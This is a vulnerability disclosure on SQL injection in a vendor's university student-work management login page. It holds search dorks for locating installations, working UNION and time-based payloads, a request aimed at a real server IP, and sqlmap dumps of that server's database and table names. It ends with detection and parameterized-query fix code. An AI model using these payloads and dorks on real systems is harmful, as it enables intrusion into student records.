A university management system has a generic SQL injection vulnerability.
Both the front end and the back end (administration side) of the Student Work Management System for Colleges and Universities by Xi'an Aoda Software Engineering Co., Ltd. are injectable.
1. University Student Work Management System front end
Search keyword: intitle: Student Work Management System Login/List.aspx?ID=
Example: http://xxx/Login/List.aspx?ID=99
sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Place: POST
Parameter: txtUserId
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/users+tables/Tables+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+logs&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+combine&txtUserId=1' union all select null, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL -- &txtPwd=1&RadioButtonList1=1&Button1=login

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/users+tables/Tables+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+logs&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+response&txtUserId=1'; waitfor delay '0:0:5'; -- &txtPwd=1&RadioButtonList1=1&Button1=login

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/users+tables/Tables+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+logs&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+response&txtUserId=1' waitfor delay '0:0:5' -- &txtPwd=1&RadioButtonList1=1&Button1=login
---
current user: 'auda'
current database: 'StudWorkXiDian'
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb

Database: pubs
[14 tables]
+--------------------+
| dbo.authors        |
| dbo.discounts      |
| dbo.employee       |
| dbo.jobs           |
| dbo.pub_info       |
| dbo.publishers     |
| dbo.roysched       |
| dbo.sales          |
| dbo.stores         |
| dbo.sysconstraints |
| dbo.syssegments    |
| dbo.titleauthor    |
| dbo.titles         |
| dbo.titleview      |
+--------------------+
2. University Student Work Management System back end
Search keyword: inurl:/Login/loginpageforuserb.aspx
Take http://112.29/Login/loginpageforuserb.aspx as an example.
The user name parameter (txtUserId) is not filtered, which results in injection.
Burp packet capture:
POST http://202.117.112.29/Login/loginpageforuserb.aspx HTTP/1.1
Host: 202.117.112.29
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.117.112.29/Login/loginpageforuserb.aspx
Cookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoaz
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 719

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95

sqlmap output for this request:

Place: POST
Parameter: txtUserId
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58),NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录
---
[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[15:36:02] [INFO] fetching current user
current user: 'auda'
[15:36:02] [INFO] fetching current database
current database: 'StudWorkXiDian'
[15:36:02] [INFO] fetching database names
[15:36:02] [INFO] the SQL query used returns 7 entries
[15:36:02] [INFO] resumed: "master"
[15:36:02] [INFO] resumed: "model"
[15:36:02] [INFO] resumed: "msdb"
[15:36:02] [INFO] resumed: "Northwind"
[15:36:02] [INFO] resumed: "pubs"
[15:36:02] [INFO] resumed: "StudWorkXiDian"
[15:36:02] [INFO] resumed: "tempdb"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb
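The three injection shapes sqlmap reported on txtUserId (a UNION query, a stacked WAITFOR DELAY, and a bare time-based WAITFOR DELAY) are easy to recognise in request logs once the form body is decoded. The following is an added example, not part of the report and not the vendor's code: a small Python triage routine that decodes urlencoded POST bodies of the shape captured above, flags those patterns per form field, and also decodes the CHAR()+CHAR() chain so an analyst can see it is only sqlmap's column-boundary marker. The sample bodies are constructed for the example; the signature names are my own.

```python
import re
from urllib.parse import parse_qs

# Signatures for the injection shapes seen in the sqlmap output above:
# UNION query, WAITFOR DELAY (time-based), a quote followed by ';' (stacked
# query), a CHAR()+CHAR()+... chain, and the trailing SQL comment.
SIGNATURES = {
    "union_query":   re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
    "time_based":    re.compile(r"\bwaitfor\s+delay\b", re.IGNORECASE),
    "stacked_query": re.compile(r"'\s*;"),
    "char_concat":   re.compile(r"(?:char\s*\(\s*\d+\s*\)\s*\+\s*){2,}char\s*\(\s*\d+\s*\)",
                                re.IGNORECASE),
    "comment_tail":  re.compile(r"--\s*$"),
}

CHAR_TOKEN = re.compile(r"char\s*\(\s*(\d+)\s*\)", re.IGNORECASE)


def decode_char_chain(expr):
    """Rebuild the string a CHAR(n)+CHAR(n)+... expression evaluates to.

    In the payloads above this is sqlmap's marker string, not exfiltrated data;
    decoding it tells the analyst which tool produced the traffic.
    """
    return "".join(chr(int(n)) for n in CHAR_TOKEN.findall(expr))


def inspect_form_body(body):
    """Decode a urlencoded POST body and return (field, signature, marker) findings.

    __VIEWSTATE / __EVENTVALIDATION are opaque base64 blobs and are skipped so
    they cannot produce false positives.  An empty list means nothing matched.
    """
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name.startswith("__"):
            continue
        for value in values:
            for sig_name, pattern in SIGNATURES.items():
                if pattern.search(value):
                    marker = decode_char_chain(value) if sig_name == "char_concat" else None
                    findings.append((name, sig_name, marker))
    return findings


def triage(bodies):
    """Indices of the bodies that should raise an alert."""
    return [i for i, body in enumerate(bodies) if inspect_form_body(body)]


# Constructed sample bodies shaped like the capture above (not real traffic).
SAMPLE_BODIES = [
    # ordinary login
    "txtUserId=20120001&txtPwd=s3cret&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95",
    # UNION probe carrying a short CHAR() chain
    "txtUserId=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28104%29"
    "%2BCHAR%28120%29%2BCHAR%2858%29%2CNULL--+&txtPwd=1&RadioButtonList1=1&Button1=1",
    # stacked time-based probe
    "txtUserId=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--&txtPwd=1&RadioButtonList1=1&Button1=1",
    # legitimate apostrophe in a name: must not alert
    "txtUserId=O%27Brien&txtPwd=pa%24%24word&RadioButtonList1=1&Button1=1",
]

if __name__ == "__main__":
    for i in triage(SAMPLE_BODIES):
        print(i, inspect_form_body(SAMPLE_BODIES[i]))
```

A lone apostrophe is deliberately not a signature: names such as O'Brien are legitimate input, and the report's point is that the application must handle that character correctly rather than reject it. Matching on the SQL keywords and the stacked/comment syntax keeps the rule set useful for IIS request logs or a WAF without flooding the queue.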
Database: StudWorkXiDian
[257 tables]
+-------------------------------+
| dbo.logTemp | dbo.test | dbo.vstipend_ApplyInfo | dbo.vsubsidy_ApplyInfo | dbo.[tsys_Modules _ test] |
| dbo.dtproperties | dbo.sysconstraints | dbo.syssegments | dbo.tAcc_File | dbo.tAppoinmentRelation |
| dbo.tAppointment | dbo.tAppointmentType | dbo.tAppointmentTypeExplain | dbo.tArr_Accessories | dbo.tArr_ArrType |
| dbo.tArr_Auditing | dbo.tArr_requiteType | dbo.tCadre_InWork | dbo.tCadre_OutWork | dbo.tCadre_StudWork |
| dbo.tDorm_Area | dbo.tDorm_Bed | dbo.tDorm_Building | dbo.tDorm_ChargeHistory | dbo.tDorm_History |
| dbo.tDorm_RewardHistory | dbo.tDorm_Room | dbo.tDorm_RoomMaster | dbo.tDorm_RoomType | dbo.tDrom_BuildingUser |
| dbo.tFile_Video | dbo.tGB_GMZ | dbo.tGB_HYZK | dbo.tGB_JKZK | dbo.tGB_SJGGHDQ |
| dbo.tGB_XB | dbo.tGB_XW | dbo.tGB_XZQH | dbo.tGB_ZZMM | dbo.tJQRY_Apply |
| dbo.tJQRY_SP | dbo.tJQRY_Type | dbo.tOther_ArcAgent | dbo.tOther_ArcBase | dbo.tOther_ArcContent |
| dbo.tOther_ArcItem | dbo.tOther_ArcTurnOver | dbo.tPoor_Student | dbo.tPopedom_Atom | dbo.tReg_register |
| dbo.tReplyAppointment | dbo.tschooloanlevel | dbo.tschooloanproportion | dbo.tschooloanrefund | dbo.tschooloans |
| dbo.tStudCadre_Info | dbo.tStudCadre_Type | dbo.tStudCadre_Unit | dbo.tStud_AllowApply | dbo.tTemp_Apply |
| reschedule | dbo.tar m_CentType | dbo.tar restart | dbo.tar m_StudRecord | descrim_policy |
| dbo.tar r_Info | dbo.tar r_repay | dbo.tasl_affrem | dbo.tasl_Bank | dbo.tasl_BankAuditing |
| dbo.tasl_BankBargain | dbo.tasl_Breach | dbo.tasl_End | dbo.tasl_Extend | dbo.tasl_Familial |
| dbo.tasl_Imburse | dbo.tasl_LoanType | dbo.tasl_Postponed | dbo.tasl_SchoolAuditing | dbo.tasl_SchoolAuditingIdea |
| dbo.tasl_StudRequisition | dbo.tasl_Whither | dbo.tbase_Department | dbo.tbase_Teacher | dbo.tbase_User |
| dbo.tcgt_StudCourse2 | dbo.tcgt_StudCourse3 | dbo.tcgt_StudRecord2 | dbo.tcgt_StudRecord3 | dbo.tcgt_stdResultCell |
| dbo.tcgt_stdResultCell2 | dbo.tcgt_stdResultCell3 | dbo.tcgt_stdScale2 | dbo.tcgt_stdScale3 | dbo.tcmoe_RewardLevel |
| dbo.tcmoe_RewardType | dbo.tcmoe_StatusChangeCause | dbo.tcmoe_StatusChangeType | dbo.tcode_Academic | dbo.tcode_BloodType |
| dbo.tcode_CultivateMode | dbo.tcode_Educate | dbo.tcode_Emigrant | dbo.tcode_Job | dbo.tcode_LoanState |
| dbo.tcode_Post | dbo.tcode_ProSchoolAccount | dbo.tcode_PsychologyLevel | dbo.tcode_StudType | dbo.tcode_TeacherRole |
| dbo.tcode_poorType | dbo.tcpt_BranchActivity | dbo.tcpt_ClassRelation | dbo.tcpt_Document | dbo.tcpt_MemberStudy |
| dbo.tcpt_PartyActive | dbo.tcpt_PartyBranch | dbo.tcpt_PartyMember | dbo.tcpt_PartyPrep | dbo.tcpt_PersonRelation |
| dbo.tcpt_Requisition | dbo.terr_Accessories | dbo.terr_Auditing | dbo.terr_Auditing2 | dbo.terr_ErrCause |
| dbo.terr_ErrInfo | dbo.terr_ErrType | dbo.terr_PunishType | dbo.terr_Remove | dbo.titem_PartyBranchType |
| dbo.titem_PartyMemberType | dbo.titem_PartySchoolType | dbo.tmem_BookEnrol | dbo.tmem_ChooseCadre | dbo.tmem_Development |
| dbo.tmem_DevelopmentNum | dbo.tmem_MemBerDocment | dbo.tmem_MemCharge | dbo.tmem_Member | dbo.tmem_OrgType |
| dbo.tmem_Party | dbo.tmem_PartyNum | dbo.tmem_Record | dbo.tmem_Rewards | dbo.tmem_TrainDepartment |
| dbo.tmem_TrainManInfo | dbo.tmem_orgMan | dbo.tmem_organization | dbo.tmema_ActivityApply | dbo.tmema_ActivityAudit |
| dbo.tmema_ActivityField | dbo.tmema_AssnJob | dbo.tmema_AssnMember | dbo.tmemp_Activity | dbo.tmemp_ComAuthor |
| dbo.tmemp_ComManuscript | dbo.tmemp_ComReport | dbo.tmemp_PublicationIssue | dbo.tmemp_PulicJob | dbo.tpopedom_UserBackManage |
| dbo.tpopedom_UserModule | dbo.treward_Information | dbo.treward_InformationG | dbo.treward_TypeG | dbo.tsafety_InsurePayforMoney |
| dbo.tsafety_InsureRegStudent | dbo.tsafety_SafetyGrade | dbo.tsafety_Type | dbo.tschol_Annotion | dbo.tschol_Apply |
| dbo.tschol_Classify | dbo.tschol_Quotas | dbo.tschol_RankObj | dbo.tssc_History | dbo.tstipend_Annotion |
| dbo.tstipend_Apply | dbo.tstipend_Apply_Temp | dbo.tstipend_Classify | dbo.tstipend_Quotas | dbo.tstipend_RankObj |
| dbo.tstud_Accessories | dbo.tstud_CardPrint | dbo.tstud_CardPrintFiled | dbo.tstud_Family | dbo.tstud_FieldEdit |
| dbo.tstud_Student_BKS | dbo.tstud_Student_Temp_BKS | dbo.tstud_Student_Temp_YJS | dbo.tstud_Student_YJS | dbo.tsubsidy_Annotion |
| dbo.tsubsidy_Apply | dbo.tsubsidy_Apply_Temp | dbo.tsubsidy_Classify | dbo.tsubsidy_Quotas | dbo.tsubsidy_RankObj |
| dbo.tsys_Download | dbo.tsys_FriendlyLink | dbo.tsys_Notice | dbo.tsys_NoticeType | dbo.tsys_Options |
| dbo.tsys_VoteList | dbo.tsys_VoteProject | dbo.tsys_VoteRen | dbo.tsys_loginLog | dbo.tsys_loginSession |
| dbo.twork_Apply | dbo.twork_Apply_Temp | dbo.twork_CheckIn | dbo.twork_Department | dbo.twork_PayMoney |
| dbo.twork_PostObj | dbo.twork_PostType | dbo.txm_PYFS | dbo.txm_SS | dbo.txm_XL |
| dbo.txm_0000x | dbo.txm_XSZT | dbo.vAloan_ListAff | dbo.vAloan_ListBasic | dbo.vAloan_ListExtend |
| dbo.vArr_ApplyInfo_BKS | dbo.vArr_ApplyInfo_YJS | dbo.vCadreGroup_state | dbo.vDorm_AllRoomDetail | dbo.vDorm_Bed |
| dbo.vDorm_BuidingCode | dbo.vDorm_CanBePreared | dbo.vDorm_CanUseBed | dbo.vDorm_Preared | dbo.vDorm_UsedBed |
| dbo.vDorm_building | dbo.vDorm_room | dbo.vDorm_student | dbo.vSchol_QuotaForDept | dbo.vschooloans_bks |
| dbo.vbase_Department | dbo.vcgt_StudSumRecord2 | dbo.vcgt_StudSumRecord3 | dbo.vcgt_student | dbo.vparty_PersonRelation |
| dbo.vparty_StatBranchSum | dbo.vpopedom_UserModule | dbo.vschol_QuotaForClass | dbo.vstipend_Classify | dbo.vstipend_QuotaForClass |
| dbo.vstipend_QuotaForDept | dbo.vstipend_QuotaForGrade | dbo.vstud_Student_BKS | dbo.vstud_Student_Temp_BKS | dbo.vstud_Student_YJS |
| dbo.vsubsidy_Classify | dbo.vsubsidy_QuotaForClass | dbo.vsubsidy_QuotaForDept | dbo.vsubsidy_QuotaForGrade | dbo.vtstud_Student_Temp_YJS |
| dbo.vwork_Department |
+-------------------------------+
Solution:
Filter every user-supplied parameter, not only txtUserId.
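The root cause behind all three sqlmap findings is the same: the login handler pastes txtUserId (and the other form fields) straight into the SQL text, so a single quote in the value changes the statement instead of being compared as data. The following is an added example written for this page, not the vendor's code: the vulnerable pattern beside its parameterized replacement, run against an in-memory SQLite stand-in for the tbase_User table that appears in the dump. The column names, the role column, and the idea that RadioButtonList1 selects a role are assumptions for the example; the page gives no schema.

```python
import sqlite3


def make_db():
    """Constructed stand-in for tbase_User (schema assumed, not the vendor's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbase_User (UserId TEXT, Pwd TEXT, Role INTEGER)")
    conn.executemany(
        "INSERT INTO tbase_User VALUES (?, ?, ?)",
        [("20120001", "s3cret", 1), ("admin", "n0t-a-real-hash", 9)],
    )
    return conn


def login_vulnerable(conn, user_id, pwd, role):
    """The flaw the report describes: form fields concatenated into the SQL text.

    Whatever the client sent becomes part of the statement.  A quote in
    user_id ends the literal early and the remainder is parsed as SQL, which
    is exactly what the UNION / WAITFOR payloads above exploit.
    """
    sql = (
        "SELECT UserId, Role FROM tbase_User WHERE UserId = '" + user_id
        + "' AND Pwd = '" + pwd + "' AND Role = " + str(role)
    )
    return conn.execute(sql).fetchall()


def login_fixed(conn, user_id, pwd, role):
    """Parameterized form: the statement is fixed, the values travel separately.

    The driver never splices user_id into the SQL, so quotes, comments and
    keywords in it are just characters being compared.  Role is numeric, so it
    is converted explicitly; a non-integer value fails here instead of reaching
    the database.
    """
    sql = "SELECT UserId, Role FROM tbase_User WHERE UserId = ? AND Pwd = ? AND Role = ?"
    return conn.execute(sql, (user_id, pwd, int(role))).fetchall()


if __name__ == "__main__":
    db = make_db()
    # A UNION value in the user name field, mirroring the injection type sqlmap
    # reported above, against each version of the query.
    probe = "x' UNION ALL SELECT 'admin', 9 -- "
    print("vulnerable:", login_vulnerable(db, probe, "wrong", 1))  # returns a row it never should
    print("fixed:     ", login_fixed(db, probe, "wrong", "1"))     # returns []
```

In the ASP.NET application itself the equivalent change is to build the query with SqlCommand parameters (SqlParameter objects) instead of string concatenation. One difference between this stand-in and the real deployment is worth knowing when reading the sqlmap output: Python's sqlite3 refuses to run more than one statement per execute() call, whereas SQL Server executes a stacked batch, which is why the stacked-query finding above is a separate and more serious result. Parameterization closes both, because the statement text no longer depends on the input at all.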